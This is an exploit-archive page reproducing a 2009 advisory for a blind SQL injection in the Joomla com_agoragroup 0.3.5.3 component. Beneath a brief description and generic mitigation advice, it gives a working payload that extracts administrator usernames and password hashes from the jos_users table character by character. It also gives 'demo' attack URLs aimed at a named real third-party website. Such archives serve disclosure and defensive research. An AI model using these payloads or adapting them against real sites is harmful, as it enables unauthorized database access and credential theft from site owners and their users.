header-logo
Suggest Exploit
vendor:
AgoraGroup
by:
Chip D3 Bi0s
7,5
CVSS
HIGH
Blind SQL injection
89
CWE
Product Name: AgoraGroup
Affected Version From: 0.3.5.3
Affected Version To: 0.3.5.3
Patch Exists: Yes
Related CWE: N/A
CPE: a:the_joomlame_team:agoragroups
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component com_agoragroup (id) Blind SQL-injection Vulnerability

A vulnerability exists in the Joomla Component com_agoragroup (id) which allows an attacker to inject malicious SQL code into the application. This can be exploited to gain access to sensitive information such as usernames and passwords. The vulnerability is due to insufficient input validation of the 'id' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL code. This can be used to gain access to sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized. Additionally, the application should be configured to use secure authentication methods such as two-factor authentication.
Source

Exploit-DB raw data:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_agoragroup (id) Blind SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


###################################################
[+] Author        :  Chip D3 Bi0s
[+] Greetz        :  d4n!ux x_jeshua + eCORE + Painboy + rayok3nt & N03!
[+] Vulnerability :  Blind SQL injection 
[+] Google Dork   :  imagine ;)
--------------------------------------------------
author       :     Russell...
author Email :     chipdebios@gmail.com

###################################################

Example:
http://localHost/path/index.php?option=com_agoragroup&con=groupdetail&id=2[SQL code]


SQL code:
and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96


DEMO:


http://notaryzip.com/index.php?option=com_agoragroup&con=groupdetail&id=2+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1
http://notaryzip.com/index.php?option=com_agoragroup&con=groupdetail&id=2+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1

http://notaryzip.com/index.php?option=com_agoragroup&con=groupdetail&id=2+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=72



etc, etc....
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

<name>AgoraGroup</name>
<version>0.3.5.3</version>
<description>AgoraGroups- Groups component for Agora Forum v.3+</description>
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
<author>The JoomlaMe team</author>
<authoremail>info@easy-joomla.org</authoremail>
<authorurl>http://www.easy-joomla.org</authorurl>

# milw0rm.com [2009-05-27]

Navigation

Suggest Exploit

Services By CQR